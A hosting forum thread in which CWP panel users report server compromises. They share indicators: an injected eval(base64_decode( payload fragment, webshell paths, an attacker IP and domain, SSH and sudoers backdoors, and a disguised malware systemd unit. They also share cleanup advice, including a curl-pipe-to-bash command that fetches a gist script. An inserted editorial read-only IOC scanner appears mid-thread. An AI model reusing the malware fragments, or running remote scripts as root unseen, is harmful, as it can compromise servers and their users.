Author Topic: I think there is a very serious security vulnerability in CWP right now.  (Read 1351 times)


Offline
*
I think there is a very serious security vulnerability in CWP right now. Tens of servers belonging to me and my friends were hacked through this vulnerability. I've been trying to identify the source for days.

Now I think I may have found the source of the problem. If this vulnerability is as I guess, it is a very serious security vulnerability. They can easily gain root access to the server.

I have been trying to explain this to CWP staff through the ticket system for days, but freelancers are handling the tickets. I mention that there may be a serious security vulnerability in the CWP panel right now, and they say "pay me to look at your ticket".

Offline
*****
IOC? Symptoms?

Offline
*
Hello,

The main symptoms are:
- `eval(base64_decode( ...` in index files. This infection most likely redirects users to various websites from the mobile version, sends all user session information to third parties, and so on.
- Creates `/var/lib/mysql/.ssh` with keys and, accordingly, gives the mysql user a /bin/bash shell in passwd.
- Adds a malicious script at `/tmp/.cwp_script.sh`.
- Creates users with random letters or similar names, such as __user, user__, login, imunify. Check: there is a .ssh directory inside.
- Creates SSH keys in the root directory: `~/.ssh/authorized_keys`
That's what I've noticed.
___
How can this be addressed?

The source of the problem is most likely an outdated version of Roundcube. This issue is described in `CVE-2025-49113`:
https://censys.com/advisory/cve-2025-49113/

This issue occurs on systems running outdated operating systems, such as CentOS 7.

I have created a script that performs the following actions:
- Pre-configuration: Interactively prompts whether to install ImunifyAV, change the SSH port, and generate a new secure password for root.
- Backdoor cleanup: Checks for malicious files in `/var/lib/mysql/.ssh` and `/tmp/.cwp_script.sh` (deletes them) and displays the date of the last modification of the root SSH keys (authorized_keys).
- Panel and Mail Updates: Installs the latest version from the 1.5.x branch.
- Network protection (CSF): Closes vulnerable CWP ports (2030, 2031, 2082, 2083, 2086, 2087, 2095, 2096) and configures a new SSH port.
Important for working with the client: since the control panel ports are closed to everyone, be sure to ask the client to provide their IP address so it can be added to the whitelist.
```
Please provide your IP address so we can add it to the firewall whitelist.
You can find your IP address at: https://2ip.io
```
- Service audit: Restarts the necessary services and displays a list of those that failed to start using `systemctl --failed`.
- Antivirus protection: Installs ImunifyAV with the user’s consent, generates an access configuration, and automatically enables background scanning of the /home directory.
- Report generation: At the end, it outputs a ready-to-use, formatted text with new access rules and a list of tasks that can be easily copied to the client.

Backups and logging:

The script modifies the firewall configuration, so a backup is saved in `/etc/csf/csf.conf.bak.<year_month_day_time>`.

The entire process and the output of the update commands are logged in: `/var/log/cwp_maintenance.log`.

You can download and use the script with the following command:

bash -c "$(curl -fsSL https://gist.githubusercontent.com/ISWAPPP/be2407dd7424d04ac3f8b2be046df221/raw/6166abc7b3a26529a93631202f6aead65f7335cf/cwp-cracked-en.sh)"

Virus total: https://www.virustotal.com/gui/url-analysis/u-6d4cf1899e7680e39a949576d464ae4f482c0e861f6a800d6ec23f20d95a12f0-1ecad511

Next, run `grep -liR 'eval(base64_decode('` in the websites directory to clean up the aftermath of the hacks.

Please let me know if you have any additional details or would like to improve the script.
« Last Edit: June 13, 2026, 01:44:29 PM by iswap »

Offline
*
We are probably talking about the same problem.

But the problem exists on a server with AlmaLinux 8 that is up to date.

Offline
*
@iswap no success

Offline
*
I can't paste my log here; the forum does not accept it.

Offline
**
We saw similar behavior on AlmaLinux 9.8 / CWP.

Observed IOCs:
- external IP: 89.248.172.183
- webshell path: /temp/.x.php
- CWP service-path shell: /usr/local/cwpsrv/var/services/oauth/v1.0a/server/www/.r.php
- downloaded payload source: mars.imasync.com
- repeated unauthorized SSH key fingerprint: SHA256:w79EbEKrlqugvMc8n/i9dQ5QuvhFBdJZDA/UKdSek2o
- mass unauthorized authorized_keys files across service/user accounts
- sudoers NOPASSWD backdoors for service/system accounts
- service/system account password hashes were set

Offline
*
Same problem. CWP urgently needs to do something about this issue. The situation exists even on the latest OS.

It is only a matter of time before our servers are encrypted. If it is encrypted, everything will be gone.

Offline
*
I can subscribe to this. Alma 8.10 with all updates.

Almost all wp-config.php files from every site had `eval(base64_decode(` added:

# grep -R "eval(base64_decode" .
./wp-config.php: eval(base64_decode("aW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAwKTsKaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsIDApOwoKaWYgKFBIUF9TQVBJICE9PSAiY2xpIiAmJiAoCiAgICBzdHJwb3MoQCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAiL3dwLWFkbWluL2FkbWluLWFqYXgucGhwIikgPT09IGZhbHNlICYmCiAgICBzdHJwb3MoQCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAiL3dwLWpzb24iKSA9PT0gZm

From my point of view the entry point is webftp_simple (present in /usr/local/apache/htdocs/).

I also had malware installed as a service that pretended to be a kernel service.

# systemctl cat defunct.service
# /usr/lib/systemd/system/defunct.service
[Unit]
Description=D-Bus System Connection Bus
After=network.target

[Service]
Type=simple
Restart=always
RestartSec=300
WorkingDirectory=/root
ExecStart=/bin/bash -c "GS_ARGS='-k /lib/systemd/system/defunct.dat -ilq' exec -a '[slub_flushwq]' '/usr/bin/defunct'"

[Install]
WantedBy=multi-user.target


Virustotal confirmed that /usr/bin/defunct is malware.

Also search for other shell files installed after breaking into the system.

find /home /var/www -name "cmd.php" -o -name "shell.php" -o -name "c99.php" \
  -o -name "r57.php" -o -name "wso.php" 2>/dev/null
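Added here as an editorial example (not iswap's script, not code from CWP, and not part of any post in this thread): a read-only shell check that looks for the indicators named across the thread, iswap's cleanup list above plus the sudoers, authorized_keys and defunct.service findings in the later replies. It assumes the paths exactly as posted and takes a root prefix so it can be run against a mounted disk image as well as a live host; it never modifies or deletes anything.

```shell
#!/usr/bin/env bash
# Read-only host check for the indicators reported in this thread.
# Editorial example, not iswap's script. ROOT is "/" on a live host or the
# mount point of an offline disk image; nothing is modified or deleted.
cwp_ioc_scan() {
    local root="${1%/}" p user home shell
    # SSH key material dropped into the MySQL data directory
    [ -d "$root/var/lib/mysql/.ssh" ] && echo "IOC: $root/var/lib/mysql/.ssh exists"
    # mysql account given a login shell
    grep -qs '^mysql:.*:/bin/bash$' "$root/etc/passwd" && echo "IOC: mysql has /bin/bash in passwd"
    # dropped helper script in /tmp
    [ -e "$root/tmp/.cwp_script.sh" ] && echo "IOC: $root/tmp/.cwp_script.sh exists"
    # fake "D-Bus" persistence unit and its binary
    for p in usr/lib/systemd/system/defunct.service usr/bin/defunct; do
        [ -e "$root/$p" ] && echo "IOC: $root/$p exists"
    done
    # NOPASSWD sudoers entries (the thread reports them for service accounts)
    grep -rslF NOPASSWD "$root/etc/sudoers" "$root/etc/sudoers.d" 2>/dev/null \
        | sed 's/^/IOC: NOPASSWD entry in /'
    # authorized_keys for accounts whose shell says they should never log in
    [ -r "$root/etc/passwd" ] && while IFS=: read -r user _ _ _ _ home shell; do
        case "$shell" in
            */nologin|*/false)
                [ -f "$root$home/.ssh/authorized_keys" ] \
                    && echo "IOC: authorized_keys for no-login account $user in $root$home" ;;
        esac
    done < "$root/etc/passwd"
    # when root's own key file was last changed (informational, not counted)
    [ -f "$root/root/.ssh/authorized_keys" ] \
        && echo "INFO: root authorized_keys mtime: $(stat -c %y "$root/root/.ssh/authorized_keys" 2>/dev/null)"
    # eval(base64_decode( injected into PHP under /home (wp-config.php, index.php, ...)
    grep -rslF --include='*.php' 'eval(base64_decode(' "$root/home" 2>/dev/null \
        | sed 's/^/IOC: eval(base64_decode in /'
    return 0
}

# Number of IOC lines found; 0 means none of the listed indicators are present.
cwp_ioc_count() { cwp_ioc_scan "$1" | grep -c '^IOC:' || true; }

# Live host:        cwp_ioc_scan /
# Mounted image:    cwp_ioc_scan /mnt/suspect-root
```

A hit is a reason to look closer, not proof on its own; an empty result only says these particular indicators are absent, not that the host is clean.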

Offline
*
I also noticed two days ago that the entry point is webftp_simple, I just didn't want to mention it here.

Offline
*****
Simple solution, keep your servers updated.
And IF you are still running CentOS 7, you can expect to be hacked, running an EOL OS that is public facing.

There was a major kernel auth vulnerability that has been actively exploited.
AlmaLinux released fixed Kernels on 2026-06-08 for AL8 and AL9.

Someone mentioned an old CVE for Roundcube, that only affected Roundcube Webmail versions prior to 1.5.10.
The current version is 1.5.15

Servers using Apache also had a problem that the update to 2.4.68 fixed.

Offline
**
The CWP team must release an urgent update that fixes all the current services with issues: RoundCube, Nginx, Apache, etc.
This is urgent!
We are paying for something that is full of security issues.

Offline
*
Nothing to do with this issue, but we have been having problems with backups for months; various updates were released and did not fix the issue.

This panel is a low-cost panel, and for that reason, there are probably few people working on it, which makes the development and bug fixing process very slow.
It has GREAT features, but needs more assistance.

I would like to express my interest in participating in the development or bug fixing of the interface.

Thanks!
Offline
*
I prepared a new server and installed AlmaLinux 9. I want to move the sites on the old server to the new server, but CWP->CWP migration does not work.

I take a manual backup from the old server and move it to the new server without any problems, but when importing it on the new server, it cannot open the compressed file and gives an error.

CWP is really starting to cost our days and our health.

Tickets that are not answered for days, security vulnerabilities that are not completely closed, functions that never work properly, etc.
« Last Edit: June 14, 2026, 01:40:09 PM by comokoko »

Offline
*
You are doing a clean installation on AlmaLinux 9. CWP is still trying to use the service command in the background. Friends, don't these developers know that the service command does not work in AlmaLinux 9?